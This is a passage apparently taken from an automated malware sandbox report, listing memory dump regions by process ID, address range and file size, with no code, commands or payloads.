                                                                                                                                    36KB

                                                                                                                                  • memory/896-108-0x0000000000D70000-0x0000000000D71000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/896-203-0x00000000003C0000-0x00000000003C1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/944-119-0x00000000001A0000-0x00000000001A1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/944-129-0x00000000048B0000-0x00000000048B1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1100-60-0x00000000753B1000-0x00000000753B3000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/1100-61-0x0000000003D00000-0x0000000003E3F000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    1.2MB

                                                                                                                                  • memory/1272-133-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1292-191-0x00000000005E0000-0x000000000061C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    240KB

                                                                                                                                  • memory/1292-192-0x000000006E901000-0x000000006E903000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/1524-196-0x00000000001D0000-0x00000000001D1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1656-200-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/1656-198-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/1756-137-0x0000000002AC0000-0x0000000002AC1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1756-126-0x0000000000930000-0x0000000000931000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1900-128-0x0000000000D40000-0x0000000000D41000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1900-118-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1996-116-0x0000000000F50000-0x0000000000F51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1996-130-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2028-122-0x0000000004780000-0x00000000050A6000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    9.1MB

                                                                                                                                  • memory/2028-123-0x0000000000400000-0x00000000027DB000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    35.9MB

                                                                                                                                  • memory/2252-148-0x0000000000020000-0x0000000000023000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    12KB

                                                                                                                                  • memory/2412-187-0x0000000002D10000-0x0000000002D2C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    112KB

                                                                                                                                  • memory/2572-226-0x000000001AA40000-0x000000001AA41000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-207-0x00000000024B0000-0x00000000024B1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-206-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/2572-227-0x000000001AA50000-0x000000001AA51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-214-0x000000001AA00000-0x000000001AA01000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-211-0x000000001A9D0000-0x000000001A9D1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-210-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-209-0x00000000024F0000-0x00000000024F1000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-208-0x000000001AC50000-0x000000001AC51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2644-174-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/2644-184-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/2680-175-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/2680-180-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB